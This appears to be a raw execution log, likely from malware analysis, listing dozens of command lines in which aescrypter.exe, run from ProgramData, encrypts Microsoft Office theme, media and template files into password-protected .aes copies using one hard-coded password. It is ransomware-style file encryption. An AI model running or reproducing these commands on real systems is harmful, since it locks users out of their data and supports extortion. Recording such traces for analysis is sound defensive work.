
"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.aes" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302827.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0302953.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG.aes" "C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0315447.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\CT_ROOTS.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\arrow.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTFORM.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

